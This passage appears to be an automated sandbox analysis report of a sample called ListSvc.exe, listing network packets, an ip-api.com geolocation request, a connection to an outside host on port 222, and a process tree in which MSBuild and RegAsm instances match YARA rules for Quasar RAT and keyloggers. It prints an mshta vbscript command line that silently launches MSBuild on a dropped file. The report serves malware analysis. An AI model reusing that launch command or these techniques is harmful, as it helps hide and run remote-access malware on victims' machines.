Oct 13, 2021 08:27:14.843930960 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.843949080 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:14.844046116 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:14.844059944 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.001933098 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.001970053 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.002022982 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.002049923 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.002216101 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.002350092 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.002671957 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.002695084 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.002738953 CEST	49707	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.002747059 CEST	443	49707	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.032548904 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.032584906 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.032702923 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.032994032 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.033006907 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.034079075 CEST	49709	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.034110069 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.034235001 CEST	49709	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.034466028 CEST	49709	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.034478903 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.074124098 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:15.074227095 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:15.074302912 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:15.074404001 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:15.074414968 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:15.074479103 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:15.075041056 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:15.075062990 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:15.075073004 CEST	49704	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:15.075079918 CEST	443	49704	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:15.121345043 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.122492075 CEST	49709	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.122529030 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.123505116 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.124234915 CEST	49709	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.124255896 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.124598026 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.124640942 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.124649048 CEST	49709	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.124666929 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.125953913 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.125979900 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.126050949 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.126068115 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.292248964 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.292282104 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.292361021 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.292434931 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.292484045 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.292939901 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.292963028 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.292975903 CEST	49708	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.292984009 CEST	443	49708	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.305330038 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.305357933 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.305403948 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.305428028 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.305557013 CEST	49709	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.305929899 CEST	49709	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.305957079 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.306029081 CEST	49709	443	192.168.2.6	20.190.160.129
Oct 13, 2021 08:27:15.306051970 CEST	443	49709	20.190.160.129	192.168.2.6
Oct 13, 2021 08:27:15.891031981 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:15.891062021 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:15.891273022 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:15.891485929 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:15.891498089 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:16.398291111 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:16.399825096 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:16.399857998 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:16.402411938 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:16.402435064 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:16.402532101 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:16.402544022 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:16.779413939 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:16.779439926 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:16.779503107 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:16.779639959 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:16.779706955 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:16.781557083 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:16.781593084 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:27:16.781611919 CEST	49713	443	192.168.2.6	20.190.154.16
Oct 13, 2021 08:27:16.781624079 CEST	443	49713	20.190.154.16	192.168.2.6
Oct 13, 2021 08:28:04.993319035 CEST	49681	80	192.168.2.6	8.247.248.223
Oct 13, 2021 08:28:04.993381023 CEST	49680	443	192.168.2.6	131.253.33.200
Oct 13, 2021 08:28:05.039433002 CEST	80	49682	178.79.242.0	192.168.2.6
Oct 13, 2021 08:28:05.039563894 CEST	49682	80	192.168.2.6	178.79.242.0
Oct 13, 2021 08:28:05.039925098 CEST	49682	80	192.168.2.6	178.79.242.0
Oct 13, 2021 08:28:05.069418907 CEST	80	49682	178.79.242.0	192.168.2.6
Oct 13, 2021 08:28:05.487567902 CEST	49683	80	192.168.2.6	2.20.178.56
Oct 13, 2021 08:28:05.674278021 CEST	80	49683	2.20.178.56	192.168.2.6
Oct 13, 2021 08:28:05.674736023 CEST	49683	80	192.168.2.6	2.20.178.56
Oct 13, 2021 08:28:05.894665956 CEST	80	49679	93.184.220.29	192.168.2.6
Oct 13, 2021 08:28:05.895190001 CEST	49679	80	192.168.2.6	93.184.220.29
Oct 13, 2021 08:28:07.499974012 CEST	80	49689	93.184.220.29	192.168.2.6
Oct 13, 2021 08:28:07.500154972 CEST	49689	80	192.168.2.6	93.184.220.29
Oct 13, 2021 08:28:08.082333088 CEST	80	49694	93.184.220.29	192.168.2.6
Oct 13, 2021 08:28:08.082638025 CEST	49694	80	192.168.2.6	93.184.220.29
Oct 13, 2021 08:28:08.422310114 CEST	49759	80	192.168.2.6	208.95.112.1
Oct 13, 2021 08:28:08.451977015 CEST	80	49759	208.95.112.1	192.168.2.6
Oct 13, 2021 08:28:08.452245951 CEST	49759	80	192.168.2.6	208.95.112.1
Oct 13, 2021 08:28:08.453706026 CEST	49759	80	192.168.2.6	208.95.112.1
Oct 13, 2021 08:28:08.483603001 CEST	80	49759	208.95.112.1	192.168.2.6
Oct 13, 2021 08:28:08.643834114 CEST	49759	80	192.168.2.6	208.95.112.1
Oct 13, 2021 08:28:09.684873104 CEST	49691	443	192.168.2.6	23.203.141.220
Oct 13, 2021 08:28:09.685344934 CEST	49694	80	192.168.2.6	93.184.220.29
Oct 13, 2021 08:28:09.868096113 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:28:09.894866943 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:28:09.895199060 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:28:09.923000097 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:28:09.987224102 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:28:11.060324907 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:28:11.087888956 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:28:11.299812078 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:28:11.326375961 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:28:11.487267017 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:28:12.065984011 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:28:12.143810034 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:28:37.101829052 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:28:37.101938009 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:28:37.176951885 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:28:37.203535080 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:28:56.071664095 CEST	49689	80	192.168.2.6	93.184.220.29
Oct 13, 2021 08:28:56.089307070 CEST	80	49689	93.184.220.29	192.168.2.6
Oct 13, 2021 08:28:56.089740992 CEST	49689	80	192.168.2.6	93.184.220.29
Oct 13, 2021 08:29:02.138668060 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:29:02.138900995 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:29:02.219482899 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:29:02.246180058 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:29:07.338440895 CEST	80	49679	93.184.220.29	192.168.2.6
Oct 13, 2021 08:29:07.339827061 CEST	49679	80	192.168.2.6	93.184.220.29
Oct 13, 2021 08:29:09.421758890 CEST	443	49684	13.107.42.16	192.168.2.6
Oct 13, 2021 08:29:11.108740091 CEST	443	49686	13.107.5.88	192.168.2.6
Oct 13, 2021 08:29:14.110620022 CEST	443	49685	13.107.5.88	192.168.2.6
Oct 13, 2021 08:29:19.850861073 CEST	80	49679	93.184.220.29	192.168.2.6
Oct 13, 2021 08:29:19.851083040 CEST	49679	80	192.168.2.6	93.184.220.29
Oct 13, 2021 08:29:26.453145981 CEST	80	49759	208.95.112.1	192.168.2.6
Oct 13, 2021 08:29:27.176672935 CEST	222	49760	89.38.99.64	192.168.2.6
Oct 13, 2021 08:29:27.176800966 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:29:27.252623081 CEST	49760	222	192.168.2.6	89.38.99.64
Oct 13, 2021 08:29:27.279223919 CEST	222	49760	89.38.99.64	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 08:28:08.364164114 CEST	60342	53	192.168.2.6	8.8.8.8
Oct 13, 2021 08:28:08.382261992 CEST	53	60342	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 08:28:08.364164114 CEST	192.168.2.6	8.8.8.8	0x365d	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 13, 2021 08:28:08.382261992 CEST	8.8.8.8	192.168.2.6	0x365d	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49759	208.95.112.1	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 08:28:08.453706026 CEST	1344	OUT	GET /json/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 Host: ip-api.com Connection: Keep-Alive
Oct 13, 2021 08:28:08.483603001 CEST	1344	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 06:28:07 GMT Content-Type: application/json; charset=utf-8 Content-Length: 294 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 31 22 2c 22 6c 61 74 22 3a 34 37 2e 31 39 33 37 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 32 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6331","lat":47.1937,"lon":8.4202,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.33"}

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ListSvc.exe PID: 6252 Parent PID: 3876

General

Start time:	08:27:19
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\ListSvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ListSvc.exe'
Imagebase:	0x400000
File size:	2295403 bytes
MD5 hash:	E16DDBBCDF1693D6FBA70E92B140E8F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ListSvc.tmp PID: 6296 Parent PID: 6252

General

Start time:	08:27:21
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp' /SL5='$6001E,1447979,821248,C:\Users\user\Desktop\ListSvc.exe'
Imagebase:	0x400000
File size:	3152896 bytes
MD5 hash:	41DE4778D27FFED036A89EF9E32156EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 2%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: ListSvc.exe PID: 6348 Parent PID: 6296

General

Start time:	08:27:22
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\ListSvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT
Imagebase:	0x400000
File size:	2295403 bytes
MD5 hash:	E16DDBBCDF1693D6FBA70E92B140E8F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: ListSvc.tmp PID: 6368 Parent PID: 6348

General

Start time:	08:27:24
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp' /SL5='$50392,1447979,821248,C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT
Imagebase:	0x400000
File size:	3152896 bytes
MD5 hash:	41DE4778D27FFED036A89EF9E32156EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 2%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: AppLaunch.exe PID: 6384 Parent PID: 6368

General

Start time:	08:27:26
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0xc00000
File size:	98912 bytes
MD5 hash:	6807F903AC06FF7E1670181378690B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: MSBuild.exe PID: 6392 Parent PID: 6368

General

Start time:	08:27:27
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' '/toolsversion:3.5 /version /nologo /val /noconlog /verbosity:quiet'
Imagebase:	0xb70000
File size:	261728 bytes
MD5 hash:	D621FD77BD585874F9686D3A76462EF1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: MSBuild.exe PID: 6408 Parent PID: 6368

General

Start time:	08:27:27
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Roaming\ListSvc.url'
Imagebase:	0x1a0000
File size:	261728 bytes
MD5 hash:	D621FD77BD585874F9686D3A76462EF1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, Author: Florian Roth Rule: xRAT_1, Description: Detects Patchwork malware, Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, Author: Florian Roth Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6416 Parent PID: 6392

General

Start time:	08:27:27
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: AppLaunch.exe PID: 6424 Parent PID: 6368

General

Start time:	08:27:27
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Roaming\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\AppLaunch.exe
Imagebase:	0x10f0000
File size:	102568 bytes
MD5 hash:	4DF5F963C7E18F062E49870D0AFF8F6F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6432 Parent PID: 6408

General

Start time:	08:27:27
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 6752 Parent PID: 6408

General

Start time:	08:27:33
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline'
Imagebase:	0x9a0000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 6892 Parent PID: 6752

General

Start time:	08:27:41
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3401.tmp' 'c:\Users\user\AppData\Local\Temp\atxm53jg\CSCE614293691B34F60A637EC21F5846844.TMP'
Imagebase:	0x340000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RegAsm.exe PID: 6340 Parent PID: 6408

General

Start time:	08:28:02
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0xc0000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 6304 Parent PID: 6408

General

Start time:	08:28:02
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x3d0000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 6420 Parent PID: 6408

General

Start time:	08:28:03
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0xd00000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: mshta.exe PID: 4240 Parent PID: 3440

General

Start time:	08:28:09
Start date:	13/10/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\mshta.exe' vbscript:execute('createobject(''wscript.shell'').run ''\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild ''''C:\Users\user\AppData\Local\Temp\ListSvc.url'''''',0:close()')
Imagebase:	0x7ff73e120000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MSBuild.exe PID: 6656 Parent PID: 4240

General

Start time:	08:28:11
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Local\Temp\ListSvc.url'
Imagebase:	0x4c0000
File size:	261728 bytes
MD5 hash:	D621FD77BD585874F9686D3A76462EF1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, Author: Florian Roth Rule: xRAT_1, Description: Detects Patchwork malware, Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, Author: Florian Roth Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 6632 Parent PID: 6656

General

Start time:	08:28:11
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 3312 Parent PID: 6656

General

Start time:	08:28:21
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
